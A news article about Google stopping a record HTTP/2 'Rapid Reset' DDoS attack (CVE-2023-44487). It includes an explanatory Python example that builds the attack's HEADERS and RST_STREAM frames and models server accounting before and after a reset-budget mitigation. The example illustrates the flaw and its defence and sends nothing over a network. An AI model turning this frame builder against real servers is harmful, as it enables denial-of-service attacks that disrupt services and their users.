Google says it has stopped the “largest Distributed Denial of Service” (DDoS) attack ever and, together with industry peers, discovered the vulnerability that made the attack possible in the first place.
In a blog post outlining its work, Google says the blocked attack was roughly 7.5 times larger than the previous record. This latest record-setter peaked at 398 million requests per second (rps), compared with the previous record of 46 million rps set last year.
“The most recent wave of attacks began in late August and continues today, targeting major infrastructure providers, including Google services, Google Cloud infrastructure, and our customers,” Google said.
Quick reset
To mount an attack of this size, the unnamed threat actors used a new HTTP/2 technique called ‘Rapid Reset’, which abuses stream multiplexing, Google explains. Stream multiplexing is a core feature of the widely adopted HTTP/2 protocol: a client can run many concurrent request streams over a single TCP connection, up to a limit the server advertises. Rapid Reset sends a request and immediately cancels it with an RST_STREAM frame; because a cancelled stream no longer counts toward that limit, the client can keep new requests flowing far faster than the server can retire the work it has already started for each one. Google says the full technical details are published in a separate write-up.
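The exchange described above, as an added example that is not Google's code or anything from the CVE advisory. It builds the raw HTTP/2 frames a Rapid Reset client sends (frame layout per RFC 9113), parses them back, and models a server's per-connection accounting twice: once with only the concurrent-stream cap, which a reset-immediately client never reaches, and once with an added per-connection budget on RST_STREAM frames, which is the general shape of the vendor mitigations. The HPACK header block, the stream cap, the reset budget and the `ConnectionModel` class are all constructed for illustration and are not taken from any real server.

```python
import struct

# Frame types, flags and error codes from RFC 9113.
HEADERS = 0x1
RST_STREAM = 0x3
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
ERR_CANCEL = 0x8  # RST_STREAM error code CANCEL

# Constructed HPACK block: static-table indexes for ":method GET",
# ":scheme http" and ":path /" (indexes 2, 6, 4 with the high bit set).
GET_ROOT_HPACK = bytes([0x82, 0x86, 0x84])


def frame(ftype, flags, stream_id, payload=b""):
    """Serialize one HTTP/2 frame: 24-bit length, type, flags, 31-bit stream id."""
    if len(payload) >= 1 << 24 or stream_id >= 1 << 31:
        raise ValueError("frame too large or stream id out of range")
    return (len(payload).to_bytes(3, "big")
            + struct.pack(">BBI", ftype, flags, stream_id)
            + payload)


def rapid_reset_burst(n):
    """Bytes a Rapid Reset client sends: n requests, each cancelled at once.

    Client-initiated stream ids are odd and increasing (1, 3, 5, ...).
    """
    out = bytearray()
    for i in range(n):
        sid = 2 * i + 1
        out += frame(HEADERS, FLAG_END_STREAM | FLAG_END_HEADERS, sid, GET_ROOT_HPACK)
        out += frame(RST_STREAM, 0, sid, struct.pack(">I", ERR_CANCEL))
    return bytes(out)


def parse_frames(data):
    """Split a byte string into (type, flags, stream_id, payload) tuples."""
    frames, off = [], 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags, sid = struct.unpack(">BBI", data[off + 3:off + 9])
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame")
        frames.append((ftype, flags, sid & 0x7FFFFFFF, payload))
        off += 9 + length
    return frames


class ConnectionModel:
    """Hypothetical server-side accounting for one connection (single window)."""

    def __init__(self, max_concurrent=100, reset_budget=None):
        self.max_concurrent = max_concurrent  # SETTINGS_MAX_CONCURRENT_STREAMS
        self.reset_budget = reset_budget      # None = no mitigation (pre-patch)
        self.open = set()
        self.peak_open = 0
        self.resets = 0
        self.dispatched = 0                   # requests handed to the backend
        self.closed = False

    def handle(self, data):
        for ftype, _flags, sid, _payload in parse_frames(data):
            if self.closed:
                break
            if ftype == HEADERS:
                if len(self.open) >= self.max_concurrent:
                    self.closed = True        # real server: GOAWAY PROTOCOL_ERROR
                    break
                self.open.add(sid)
                self.peak_open = max(self.peak_open, len(self.open))
                self.dispatched += 1          # backend work starts before the reset arrives
            elif ftype == RST_STREAM:
                self.open.discard(sid)        # stream no longer counts toward the cap
                self.resets += 1
                if self.reset_budget is not None and self.resets > self.reset_budget:
                    self.closed = True        # real server: GOAWAY ENHANCE_YOUR_CALM
                    break
        return self


def simulate(n_requests, reset_budget=None):
    """Feed one Rapid Reset burst to the model and return its final state."""
    return ConnectionModel(reset_budget=reset_budget).handle(rapid_reset_burst(n_requests))


if __name__ == "__main__":
    before = simulate(10_000)
    after = simulate(10_000, reset_budget=1_000)
    print(f"pre-patch: peak open={before.peak_open} dispatched={before.dispatched} closed={before.closed}")
    print(f"mitigated: peak open={after.peak_open} dispatched={after.dispatched} closed={after.closed}")
```

The pre-patch model never has more than one stream open at a time, so the concurrency cap is never hit and all 10,000 requests reach the backend from a single connection. With a reset budget the same burst is cut off shortly after the 1,000th cancel. Real mitigations count resets per time window and weigh them against streams that completed normally, so that legitimate clients cancelling the odd request are not penalised; the single-window budget here is a simplification.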
Shortly after detecting the attack, Google introduced additional mitigation strategies and reached out to industry peers (cloud providers and the like) that also use the HTTP/2 protocol stack. “We shared information about the attack and mitigation methods in real time as the attacks were underway,” Google said.
Together they identified a weakness in the HTTP/2 protocol itself, affecting many server implementations, tracked as CVE-2023-44487, a high-severity flaw with a CVSS score of 7.5 out of 10.
Companies should check whether their HTTP/2 servers are vulnerable and, if so, apply the patch, Google says. “If you manage or operate your own HTTP/2 compliant server (open source or commercial), you should immediately apply a patch from the relevant vendor as soon as it becomes available,” the company concluded.
DDoS attacks are a common tactic among cybercriminals, disrupting Internet-facing websites and services.